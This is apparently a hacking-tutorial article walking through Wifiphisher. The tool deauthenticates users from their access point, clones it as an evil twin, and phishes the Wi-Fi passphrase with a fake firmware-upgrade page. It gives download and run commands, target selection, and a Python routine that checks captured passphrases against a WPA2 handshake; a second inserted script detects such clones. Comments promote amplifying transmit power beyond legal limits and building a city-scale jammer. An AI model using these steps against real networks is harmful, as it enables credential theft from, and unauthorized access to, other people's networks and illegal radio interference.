Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher

Welcome back, my tenderfoot hackers!
Do you need to get a Wi-Fi password but don't have the time to crack it? In previous tutorials, I have shown how to crack WEP, WPA2, and WPS, but some people have complained that cracking WPA2 takes too long and that not all access points have WPS enabled (even though quite a few do). To help out in these situations, I present to you an almost surefire way to get a Wi-Fi password without cracking it: Wifiphisher.

Steps in the Wifiphisher Strategy

The idea here is to create an evil twin AP, then de-authenticate or DoS the user from their real AP. When they re-authenticate to your fake AP with the same SSID, they will see a legitimate-looking webpage that requests their password because of a "firmware upgrade." When they provide their password, you capture it and then allow them to use the evil twin as their AP, so they don't suspect a thing. Brilliant!
To sum up, Wifiphisher takes the following steps:
  1. De-authenticate the user from their legitimate AP.
  2. Allow the user to authenticate to your evil twin.
  3. Offer a webpage to the user on a proxy that notifies them that a "firmware upgrade" has taken place, and that they need to authenticate again.
  4. The Wi-Fi password is passed to the hacker and the user continues to the web oblivious to what just happened.
Similar scripts have been around for a while, such as Airsnarf, but this new Wifiphisher script is more sophisticated. In addition, you could always do all of this manually, but now we have a script that automates the entire process. Recently, another script named Fluxion has also gained popularity as an alternative to Wifiphisher. You can check out this great guide on Fluxion if Wifiphisher isn't working for you.
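Seen from the victim's side, the clone described above is a second access point beaconing the same ESSID under a different BSSID, and, since the user is expected to join it without a passphrase, an open network standing next to a WPA2 one (the article implies this; it is assumed here rather than stated by the tool's documentation). The Python below is an added example, not part of the original article or of Wifiphisher's code: it parses a constructed, simplified scan listing (not real iw or airodump-ng output; the BSSIDs and ESSIDs are made up) and flags an ESSID that is advertised both with and without WPA2, which is the indicator a defender or a cautious user would check for.

```python
from collections import defaultdict

# Constructed scan listing in a simplified "field=value" form (not real iw or
# airodump-ng output); BSSIDs and ESSIDs are made up. "rsn=yes" means the
# beacon carried an RSN (WPA2) element, "rsn=no" that the network is open.
CONSTRUCTED_SCAN = """\
bssid=aa:bb:cc:dd:ee:01 essid=wonderhowto signal=-61 rsn=yes
bssid=aa:bb:cc:dd:ee:02 essid=wonderhowto signal=-38 rsn=no
bssid=aa:bb:cc:dd:ee:03 essid=wonderhowto signal=-75 rsn=yes
bssid=11:22:33:44:55:66 essid=corp-lobby signal=-70 rsn=yes
bssid=11:22:33:44:55:67 essid=corp-lobby signal=-68 rsn=yes
bssid=99:88:77:66:55:44 essid=free-cafe signal=-55 rsn=no
"""


def parse_scan(text: str) -> list:
    """One dict per BSS line: bssid, essid, signal (dBm), rsn (bool)."""
    bss_list = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split())
        bss_list.append({
            "bssid": fields["bssid"].lower(),
            "essid": fields["essid"],
            "signal": int(fields["signal"]),
            "rsn": fields["rsn"] == "yes",
        })
    return bss_list


def evil_twin_candidates(bss_list: list) -> list:
    """Flag every open BSS whose ESSID is also advertised with WPA2 by another BSSID.

    That is the footprint of the clone described above: same name, different
    BSSID, no encryption. An ESSID on several BSSIDs that all use WPA2 is a
    normal multi-AP network and is not flagged; an ESSID that is only ever
    open is not flagged either."""
    by_essid = defaultdict(list)
    for bss in bss_list:
        by_essid[bss["essid"]].append(bss)

    findings = []
    for essid, aps in by_essid.items():
        secured = [a for a in aps if a["rsn"]]
        open_aps = [a for a in aps if not a["rsn"]]
        if not (secured and open_aps):
            continue
        strongest_legit = max(a["signal"] for a in secured)
        for rogue in open_aps:
            findings.append({
                "essid": essid,
                "rogue_bssid": rogue["bssid"],
                "legit_bssids": sorted(a["bssid"] for a in secured),
                # A clone only wins the reconnect if it is louder than the real AP.
                "louder_than_legit": rogue["signal"] > strongest_legit,
            })
    return findings


if __name__ == "__main__":
    for finding in evil_twin_candidates(parse_scan(CONSTRUCTED_SCAN)):
        print(finding)
```

The check deliberately stays quiet about an ESSID that appears on several BSSIDs all using WPA2, because that is what a normal multi-AP network looks like. It misses a rogue that advertises WPA2 with a made-up PSK, the variant in which the victim's client simply fails the 4-way handshake; from the client side the reliable tells remain the BSSID change and a browser page asking for the Wi-Fi passphrase, which a genuine firmware update never does.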
To do this hack, you will need Kali Linux and two wireless network adapters, one of which must be capable of packet injection. You can use the tried and true AWUS036NHA, or check out our guide on picking the best wireless network adapter for Kali Linux.
You may use others, but before you do, make certain that it is compatible with Aircrack-ng (packet injection capable). Please do NOT post questions on why it doesn't work until you check if your wireless adapter can do packet injection. Most cannot.
Make sure you get an adapter that works with Kali Linux; check out our updated guide on buying one. (Image by SADMIN/Null Byte)
Now let's take a look at Wifiphisher.

Step 1: Download Wifiphisher

To begin, fire up Kali and open a terminal. Then download Wifiphisher from GitHub and unpack the code.
kali > tar -xvzf /root/wifiphisher-1.1.tar.gz
As you can see below, I have unpacked the Wifiphisher source code.
Alternatively, you can clone the code from GitHub by typing:
kali > git clone https://github.com/sophron/wifiphisher

Step 2: Navigate to the Directory

Next, navigate to the directory that Wifiphisher created when it was unpacked. In my case, it is /wifiphisher-1.1.
kali > cd wifiphisher-1.1
When listing the contents of that directory, you will see that the wifiphisher.py script is there.
kali > ls -l

Step 3: Run the Script

You can run the Wifiphisher script by typing:
kali > python wifiphisher.py
Note that I preceded the script with the name of the interpreter, python.
The first time you run the script, it will likely tell you that "hostapd" is not found and will prompt you to install it. Install by typing "y" for yes. It will then proceed to install hostapd.
When it has completed, once again, execute the Wifiphisher script.
kali > python wifiphisher.py
This time, it will start the web server on ports 8080 and 443, then go about discovering the available Wi-Fi networks.
When it has completed, it will list all the Wi-Fi networks it has discovered. Notice at the bottom of my example that it has discovered the network "wonderhowto." That is the network we will be attacking.

Step 4: Send Your Attack & Get the Password

Go ahead and hit Ctrl C on your keyboard and you will be prompted for the number of the AP that you would like to attack. In my case, it is 12.
When you hit Enter, Wifiphisher will display a screen like the one below that indicates the interface being used and the SSID of the AP being attacked and cloned.
The target user has been de-authenticated from their AP. When they re-authenticate, they will be directed to the cloned evil twin access point.
When they do, the proxy on the web server will catch their request and serve up an authentic-looking message that a firmware upgrade has taken place on their router and they must re-authenticate.
Notice that I have put in my password, nullbyte, and hit Submit.
When the user enters their password, it is displayed in the open Wifiphisher terminal, as seen below. The user's traffic is then forwarded through your system out to the Internet, so they never suspect anything awry has happened.
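As the walkthrough shows, Wifiphisher records whatever the user types into the form, so a typo or a deliberately wrong entry is captured just like the real passphrase. The check a practitioner wants before relying on the result is the one aircrack-ng performs when cracking: derive the WPA2 key material from the candidate passphrase and the SSID and confirm that it reproduces the MIC on a captured 4-way handshake. The Python below is an added example, not Wifiphisher's code and not from the original article; because it has to run offline, it constructs its own handshake message 2 from the page's SSID wonderhowto and passphrase nullbyte with made-up MAC addresses and nonces, then verifies candidates against it. It handles only key descriptor version 2 (WPA2 with CCMP, HMAC-SHA1 MIC); WPA/TKIP frames use an HMAC-MD5 MIC and are not covered.

```python
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame: EAPOL header (4) + descriptor type (1)
# + key info (2) + key length (2) + replay counter (8) = 17 bytes to the nonce;
# nonce (32) + key IV (16) + RSC (8) + key ID (8) = 64 more bytes to the MIC.
NONCE_OFFSET = 17
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces));
    its first 16 bytes are the Key Confirmation Key that keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Descriptor version 2 MIC: HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed, first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def verify_passphrase(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                      anonce: bytes, msg2: bytes) -> bool:
    """True if the candidate passphrase reproduces the MIC the station put on handshake message 2."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = kck_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


# --- Constructed handshake so the example runs offline; this is not a real capture ---

def build_msg2(snonce: bytes, mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Minimal EAPOL-Key message 2: RSN descriptor, key info 0x010a = version 2 | pairwise | MIC, no key data."""
    body = (bytes([2])                         # descriptor type 2 = RSN (WPA2)
            + (0x010a).to_bytes(2, "big")      # key information
            + (16).to_bytes(2, "big")          # key length (CCMP)
            + (1).to_bytes(8, "big")           # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in message 2)
            + mic
            + (0).to_bytes(2, "big"))          # key data length
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = EAPOL-Key


def constructed_capture(passphrase: str, ssid: str) -> dict:
    """Fabricate what a real capture would give us, with a valid MIC computed from the true passphrase.
    The MAC addresses and nonces are made up."""
    ap_mac = bytes.fromhex("0011223344aa")
    sta_mac = bytes.fromhex("66778899bbcc")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "msg2": msg2}


# SSID and passphrase as in the walkthrough above; everything else is constructed.
CONSTRUCTED_CAPTURE = constructed_capture("nullbyte", "wonderhowto")

if __name__ == "__main__":
    for guess in ("nullbyte", "nu11byte", "Nullbyte"):
        status = "valid" if verify_passphrase(guess, **CONSTRUCTED_CAPTURE) else "wrong"
        print(f"{guess!r}: {status}")
```

On a real capture you would take the AP and station MACs from the 802.11 headers, the ANonce from message 1 and the complete EAPOL frame of message 2, and pass those to verify_passphrase in place of CONSTRUCTED_CAPTURE. Note that the SSID is part of the key derivation, so the handshake must come from the real AP, not from the clone.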
Get started hacking on our Kali Linux build. (Image by SADMIN/Null Byte)
If you're looking for a cheap, handy platform to get started working with Wifiphisher, check out our Kali Linux Raspberry Pi build using the $35 Raspberry Pi.
Now, my tenderfoot hackers, no Wi-Fi password is safe once its owner can be talked into typing it into a web page; nothing here breaks WPA2 itself, so the attack lives or dies on the phishing page being believed. Keep coming back as we explore more of the world's most valuable skill set: hacking!

147 Comments

Hmmm interesting. I will try this when I get out of class. Maybe even be useful to have supported as an add on in my script I am working on.
Interesting.
-Phoenix750
Why don't you shut down the Wi-Fi, then name your device the SSID of the Wi-Fi, let them sign in, and when it's done direct them to the true SSID? You get the username and password, and might as well add yourself on their list thing.
great trick
but the problem is that the evil twin doesn't have the same BSSID as the original, so you can see two APs with the same ESSID and devices won't connect automatically...
so if the script could be edited for that, it would be perfect
You have to make sure the rogue AP's signal is stronger than the legit one. So you have to be close, or use a powerful antenna. Once you deauth your target pc, it will try to reconnect and will pick the strongest signal (yours).
Excellent point, TripHat. Check out the tutorials on increasing TX power here on Null Byte. Our trusty Alfa AWUSH can be amped up to 4x the legal limit.
A side note about the Wi-Fi scrambler I am going to build in my Electricity/Electronics for Hackers series: my scrambler will be able to send out signals that reach 8 watts, which is roughly 10-30 times higher than the legal limit. I haven't tested my design actually, because I'm afraid of legal consequences.
-Phoenix750
Very interesting... if that will fit in my poor hardware knowledge, I'd be glad to test it. Also, to find out your real position, someone would have to triangulate the signal... that is not so easy if you're just running a test.
With a well-placed antenna, this jammer is capable of leaving a small town without Wi-Fi. With even more power and a higher spot, this jammer may be capable of scrambling any wireless communication in an entire city like Chicago. Yes, an entire city!
The reason I am careful when working with the electromagnetic spectrum is because of something that happened to my dad when he was in his 20s. My dad was, and still is, just like me, a passionate hardware hacker. One of the earliest things he did was build a radio transmitter for his town. This transmitter had a power of 100-200 watts and was placed on a high hill. My dad was successful in broadcasting his radio programs to our town (he was a hobby DJ back then), but it did have its consequences. First of all, he never got permission to broadcast at that wattage and on that frequency (which was 100.2 MHz, in case anyone is wondering), but he also caused disturbances at the airport of Amsterdam with his radio transmitter. Yes, the airport of Amsterdam, and we live near Brussels!
The reason this happened is because some of his radio waves reached Amsterdam, but not at the frequency he broadcast at. These waves were just simple pulses that occurred every minute or so. But by crazy coincidence, these waves were at the same frequency the Amsterdam airport was using for its control towers, and thus it caused disturbances in the communications between the pilots and the airport.